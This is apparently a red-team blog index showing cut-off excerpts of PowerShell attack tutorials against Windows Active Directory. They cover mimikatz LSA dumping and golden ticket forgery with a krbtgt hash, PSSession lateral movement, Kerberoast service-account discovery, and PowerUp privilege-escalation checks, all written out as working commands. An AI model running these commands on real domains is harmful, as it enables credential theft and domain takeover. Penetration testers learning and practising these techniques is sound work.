Powershell * RED TEAM SECURITY

Persistence Flow

Persistence Technique: Golden Ticket

Execute mimikatz on DC:
mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch -computername WIN-2RUMVG5JPOC
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"lsadump::lsa /patch"'

On any machine:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command '"kerberos::golden /user:administrator /domain:security.local /sid:S-1-5-21-2515352101-914078745-3278884511-1001 /krbtgt:30ca30e0cbc0f87b2f5bac01794a2357 /id:500 /groups:513 /ptt"'

To use the DCSync feature for getting the krbtgt hash, execute the below command with DA privileges for…

Lateral Movement Protocols And Tools

One-to-one: PSSession
Interactive. Runs in a new process (wsmprovhost). Is stateful.
Useful cmdlets: New-PSSession, Enter-PSSession
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> New-PSSession -ComputerName WIN-2RUMVG5JPOC
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> $sess = New-PSSession -ComputerName WIN-2RUMVG5JPOC
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerUp-master\PowerUp-master> Enter-PSSession -Session $sess
[WIN-2RUMVG5JPOC]: PS C:\Users\Administrator\Documents> hostname

One-to-many: Also known as fan-out remoting.
Non-interactive. Executes commands in parallel.
Useful cmdlets: Invoke-Command
Invoke-Command: Run commands & scripts on…

Domain Privilege Escalation

Domain Priv Escalation: Kerberoast

Find service accounts:
GetUserSPNs: https://github.com/nidem/kerberoast/blob/master/GetUserSPNs.ps1

PowerView:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerView> Get-NetUser -SPN

Active Directory Module:
PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Import-ActiveDirectory.ps1
PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll
PS C:\Users\victim6\Downloads\new\new\tool\tool\ADModule-master\ADModule-master> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName

If you get the error "You cannot call a method on a null-valued expression", then use the below command to…

Local Privilege Escalation

PowerUp:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master> cd .\PowerUp\
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> dir
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> . .\PowerUp.ps1

Get services with unquoted paths and a space in their executable path:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerTools-master\PowerTools-master\PowerUp> Get-ServiceUnquoted -Verbose

Get services where the current user can write to the binary path:
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Import-Module .\PowerSploit.psm1
PS C:\Users\victim6\Downloads\new\new\tool\tool\PowerSploit-master\PowerSploit-master> Get-ModifiableService -Verbose

Get the services which the current user can…